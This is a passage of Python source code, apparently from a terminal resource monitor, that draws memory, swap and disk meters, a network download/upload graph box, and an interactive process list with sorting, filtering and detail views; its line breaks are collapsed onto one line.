1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}' cy += 1 if not cls.graph_height else cls.graph_height #* Swap if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string: if h - cy > 5: if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}' cy += 1 out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}' cy += 1 for name in cls.swap_names: if Collector.collect_interrupt: return if cls.mem_size > 2: out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}' f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}') cy += 2 if not cls.graph_height else cls.graph_height + 1 else: out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}' #* Disks if CONFIG.show_disks and mem.disks: cx = x + cls.mem_width - 1; cy = 0 big_disk: bool = cls.disks_width >= 25 gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}' for name, item in mem.disks.items(): if Collector.collect_interrupt: return if not name in Meters.disks_used: continue if cy > h - 2: break out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}') out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}' out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U " out += f'{Meters.disks_used[name]}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}' cy += 2 if len(mem.disks) * 3 <= h + 1: if cy > h - 1: break out += Mv.to(y+cy, x+cx) out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}' out += f'{Meters.disks_free[name]}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}' cy += 1 if len(mem.disks) * 4 <= h + 1: cy += 1 except (KeyError, TypeError): return Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active) cls.resized = cls.redraw = False class NetBox(Box, SubBox): name = "net" height_p = 30 width_p = 45 x = 1 y = 1 resized: bool = True redraw: bool = True graph_height: Dict[str, int] = {} symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"} buffer: str = "net" Box.buffers.append(buffer) @classmethod def _calc_size(cls): width_p: int if cls.stat_mode: width_p = 100 else: width_p = cls.width_p cls.width = round(Term.width * width_p / 100) cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h cls.y = Term.height - cls.height + 1 cls.box_width = 27 if cls.width > 45 else 19 cls.box_height = 9 if cls.height > 10 else cls.height - 2 cls.box_x = cls.width - cls.box_width - 1 cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1 cls.graph_height["download"] = round((cls.height - 2) / 2) cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"] cls.redraw = True @classmethod def _draw_bg(cls) -> str: if cls.proc_mode: return "" return f'{create_box(box=cls, line_color=THEME.net_box)}\ {create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}' @classmethod def _draw_fg(cls): if cls.proc_mode: return net = NetCollector if net.redraw: cls.redraw = True if not net.nic: return out: str = "" out_misc: str = "" x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2 bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2 reset: bool = bool(net.stats[net.nic]["download"]["offset"]) if cls.resized or cls.redraw: out_misc += cls._draw_bg() if not "b" in Key.mouse: Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)] Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)] Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)] out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}' f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}' f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}') if w - len(net.nic[:10]) - 20 > 6: if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)] out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}' f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}') if w - len(net.nic[:10]) - 20 > 13: if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)] out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}' f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}') Draw.buffer("net_misc", out_misc, only_save=True) cy = 0 for direction in ["download", "upload"]: strings = net.strings[net.nic][direction] stats = net.stats[net.nic][direction] if cls.redraw: stats["redraw"] = True if stats["redraw"] or cls.resized: Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"], invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None) out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}' out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' + ("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}')) cy += 1 if bh != 3 else 2 if bh >= 6: out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}' cy += 1 if bh >= 4: out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}' if bh > 2 and bh % 2: cy += 2 else: cy += 1 stats["redraw"] = False out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}' f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}') Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active) cls.redraw = cls.resized = False class ProcBox(Box): name = "proc" height_p = 68 width_p = 55 x = 1 y = 1 current_y: int = 0 current_h: int = 0 select_max: int = 0 selected: int = 0 selected_pid: int = 0 last_selection: int = 0 filtering: bool = False moved: bool = False start: int = 1 count: int = 0 s_len: int = 0 detailed: bool = False detailed_x: int = 0 detailed_y: int = 0 detailed_width: int = 0 detailed_height: int = 8 resized: bool = True redraw: bool = True buffer: str = "proc" pid_counter: Dict[int, int] = {} Box.buffers.append(buffer) @classmethod def _calc_size(cls): width_p: int; height_p: int if cls.proc_mode: width_p, height_p = 100, 80 else: width_p, height_p = cls.width_p, cls.height_p cls.width = round(Term.width * width_p / 100) cls.height = round(Term.height * height_p / 100) if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h cls.x = Term.width - cls.width + 1 cls.y = Box._b_cpu_h + 1 cls.current_y = cls.y cls.current_h = cls.height cls.select_max = cls.height - 3 cls.redraw = True cls.resized = True @classmethod def _draw_bg(cls) -> str: if cls.stat_mode: return "" return create_box(box=cls, line_color=THEME.proc_box) @classmethod def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)): old: Tuple[int, int] = (cls.start, cls.selected) new_sel: int if key == "up": if cls.selected == 1 and cls.start > 1: cls.start -= 1 elif cls.selected == 1: cls.selected = 0 elif cls.selected > 1: cls.selected -= 1 elif key == "down": if cls.selected == 0 and ProcCollector.detailed and cls.last_selection: cls.selected = cls.last_selection cls.last_selection = 0 if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start += 1 elif cls.selected < cls.select_max: cls.selected += 1 elif key == "mouse_scroll_up" and cls.start > 1: cls.start -= 5 elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start += 5 elif key == "page_up" and cls.start > 1: cls.start -= cls.select_max elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start += cls.select_max elif key == "home": if cls.start > 1: cls.start = 1 elif cls.selected > 0: cls.selected = 0 elif key == "end": if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1 elif cls.selected < cls.select_max: cls.selected = cls.select_max elif key == "mouse_click": if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1: if mouse_pos[1] == cls.current_y + 2: cls.start = 1 elif mouse_pos[1] == cls.current_y + 1 + cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1 else: cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2))) else: new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0 if new_sel > 0 and new_sel == cls.selected: Key.list.insert(0, "enter") return elif new_sel > 0 and new_sel != cls.selected: if cls.last_selection: cls.last_selection = 0 cls.selected = new_sel elif key == "mouse_unselect": cls.selected = 0 if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1 elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs if cls.start < 1: cls.start = 1 if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs elif cls.selected > cls.select_max: cls.selected = cls.select_max if cls.selected < 0: cls.selected = 0 if old != (cls.start, cls.selected): cls.moved = True Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True) @classmethod def _draw_fg(cls): if cls.stat_mode: return proc = ProcCollector if proc.proc_interrupt: return if proc.redraw: cls.redraw = True out: str = "" out_misc: str = "" n: int = 0 x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2 prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int dgx: int; dgw: int; dx: int; dw: int; dy: int l_count: int = 0 scroll_pos: int = 0 killed: bool = True indent: str = "" offset: int = 0 tr_show: bool = True usr_show: bool = True vals: List[str] g_color: str = "" s_len: int = 0 if proc.search_filter: s_len = len(proc.search_filter[:10]) loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}' end: str = "" if proc.detailed: dgx, dgw = x, w // 3 dw = w - dgw - 1 if dw > 120: dw = 120 dgw = w - 121 dx = x + dgw + 2 dy = cls.y + 1 if w > 67: arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0) prog_len = 15 else: arg_len = 0 prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0) if prog_len < 15: tr_show = False prog_len += 5 if prog_len < 12: usr_show = False prog_len += 9 if CONFIG.proc_tree: tree_len = arg_len + prog_len + 6 arg_len = 0 #* Buttons and titles only redrawn if needed if cls.resized or cls.redraw: s_len += len(CONFIG.proc_sorting) if cls.resized or s_len != cls.s_len or proc.detailed: cls.s_len = s_len for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]: if k in Key.mouse: del Key.mouse[k] if proc.detailed: killed = proc.details["killed"] main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented: cls.current_y = cls.y + 8 cls.current_h = cls.height - 8 for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}' out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}' f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}') for i in range(7): out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}' out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}' f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}' f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}' f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if cls.selected == 0: Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)] if cls.selected == 0 and not killed: Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)] out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}' f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if dw > 28: if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if dw > 39: if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if Graphs.detailed_cpu is NotImplemented or cls.resized: Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu) Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem) cls.select_max = cls.height - 11 y = cls.y + 9 h = cls.height - 10 else: if cls.current_y != cls.y or cls.resized: cls.current_y = cls.y cls.current_h = cls.height y, h = cls.y + 1, cls.height - 2 out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}' f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}' f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}') cls.select_max = cls.height - 3 sort_pos = x + w - len(CONFIG.proc_sorting) - 7 if not "left" in Key.mouse: Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)] Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)] out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' + ("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") + f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} ' f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if w > 29 + s_len: if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)] out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}' f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if w > 37 + s_len: if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)] out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}' f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if w > 47 + s_len: if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)] out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}' f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}') if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+5 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))] if proc.search_filter: if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+11 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)] elif "delete" in Key.mouse: del Key.mouse["delete"] out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' + ("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') + f'{THEME.proc_box(Symbol.title_right)}') main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg title = THEME.inactive_fg if cls.selected == 0 else THEME.title out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}' f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}' f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}' f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}') if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)] if w - len(loc_string) > 34: if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if w - len(loc_string) > 40: if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if w - len(loc_string) > 51: if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}' if CONFIG.proc_tree and w - len(loc_string) > 65: if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)] out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}' #* Processes labels selected: str = CONFIG.proc_sorting label: str if selected == "memory": selected = "mem" if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr" if CONFIG.proc_tree: label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' + (" " if proc.num_procs > cls.select_max else "")) if selected in ["pid", "program", "arguments"]: selected = "tree" else: label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") + ((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' + (" " if proc.num_procs > cls.select_max else "")) if selected == "program" and prog_len <= 8: selected = "prg" selected = selected.split(" ")[0].capitalize() if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB") label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}') out_misc += label Draw.buffer("proc_misc", out_misc, only_save=True) #* Detailed box draw if proc.detailed: if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}' else: stat_color = "" expand = proc.expand iw = (dw - 3) // (4 + expand) iw2 = iw - 1 out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}' f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}') for i, l in enumerate(["C", "P", "U"]): out += f'{Mv.to(dy+2+i, dgx)}{l}' for i, l in enumerate(["C", "M", "D"]): out += f'{Mv.to(dy+4+i, dx+1)}{l}' out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' + (f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") + (f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") + (f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") + (f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") + f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' + (f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") + (f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") + (f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") + (f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") + f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}' f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} ' f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}') cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5) for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))): out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}' if i == 2: break #* Checking for selection out of bounds if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1 elif cls.start > proc.num_procs: cls.start = proc.num_procs if cls.start < 1: cls.start = 1 if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs elif cls.selected > cls.select_max: cls.selected = cls.select_max if cls.selected < 0: cls.selected = 0 #* Start iteration over all processes and info cy = 1 for n, (pid, items) in enumerate(proc.processes.items(), start=1): if n < cls.start: continue l_count += 1 if l_count == cls.selected: is_selected = True cls.selected_pid = pid else: is_selected = False indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]] if CONFIG.proc_tree: arg_len = 0 offset = tree_len - len(f'{indent}{pid}') if offset < 1: offset = 0 indent = f'{indent:.{tree_len - len(str(pid))}}' if offset - len(name) > 12: cmd = cmd.split(" ")[0].split("/")[-1] if not cmd.startswith(name): offset = len(name) arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2 cmd = f'({cmd[:(arg_len-4)]})' else: offset = prog_len - 1 if cpu > 1.0 or pid in Graphs.pid_cpu: if pid not in Graphs.pid_cpu: Graphs.pid_cpu[pid] = Graph(5, 1, None, [0]) cls.pid_counter[pid] = 0 elif cpu < 1.0: cls.pid_counter[pid] += 1 if cls.pid_counter[pid] > 10: del cls.pid_counter[pid], Graphs.pid_cpu[pid] else: cls.pid_counter[pid] = 0 end = f'{THEME.main_fg}{Fx.ub}' if CONFIG.proc_colors else Fx.ub if cls.selected > cy: calc = cls.selected - cy elif 0 < cls.selected <= cy: calc = cy - cls.selected else: calc = cy if CONFIG.proc_colors and not is_selected: vals = [] for v in [int(cpu), int(mem), int(threads // 3)]: if CONFIG.proc_gradient: val = ((v if v <= 100 else 100) + 100) - calc * 100 // cls.select_max vals += [f'{THEME.gradient["proc_color" if val < 100 else "process"][val if val < 100 else val - 100]}'] else: vals += [f'{THEME.gradient["process"][v if v <= 100 else 100]}'] c_color, m_color, t_color = vals else: c_color = m_color = t_color = Fx.b if CONFIG.proc_gradient and not is_selected: g_color = f'{THEME.gradient["proc"][calc * 100 // cls.select_max]}' if is_selected: c_color = m_color = t_color = g_color = end = "" out += f'{THEME.selected_bg}{THEME.selected_fg}{Fx.b}' #* Creates one line for a process with all gathered information out += (f'{Mv.to(y+cy, x)}{g_color}{indent}{pid:>{(1 if CONFIG.proc_tree else 7)}} ' + f'{c_color}{name:<{offset}.{offset}} {end}' + (f'{g_color}{cmd:<{arg_len}.{arg_len-1}}' if arg_len else "") + (t_color + (f'{threads:>4} ' if threads < 1000 else "999> ") + end if tr_show else "") + (g_color + (f'{username:<9.9}' if len(username) < 10 else f'{username[:8]:<8}+') if usr_show else "") + m_color + ((f'{mem:>4.1f}' if mem < 100 else f'{mem:>4.0f} ') if not CONFIG.proc_mem_bytes else f'{floating_humanizer(mem_b, short=True):>4.4}') + end + f' {THEME.inactive_fg}{"⡀"*5}{THEME.main_fg}{g_color}{c_color}' + (f' {cpu:>4.1f} ' if cpu < 100 else f'{cpu:>5.0f} ') + end + (" " if proc.num_procs > cls.select_max else "")) #* Draw small cpu graph for process if cpu usage was above 1% in the last 10 updates if pid in Graphs.pid_cpu: out += f'{Mv.to(y+cy, x + w - (12 if proc.num_procs > cls.select_max else 11))}{c_color if CONFIG.proc_colors else THEME.proc_misc}{Graphs.pid_cpu[pid](None if cls.moved else round(cpu))}{THEME.main_fg}' if is_selected: out += f'{Fx.ub}{Term.fg}{Term.bg}{Mv.to(y+cy, x + w - 1)}{" " if proc.num_procs > cls.select_max else ""}' cy += 1 if cy == h: break if cy < h: for i in range(h-cy): out += f'{Mv.to(y+cy+i, x)}{" " * w}' #* Draw scrollbar if needed if proc.num_procs > cls.select_max: if cls.resized: Key.mouse["mouse_scroll_up"] = [[x+w-2+i, y] for i in range(3)] Key.mouse["mouse_scroll_down"] = [[x+w-2+i, y+h-1] for i in range(3)] scroll_pos = round(cls.start * (cls.select_max 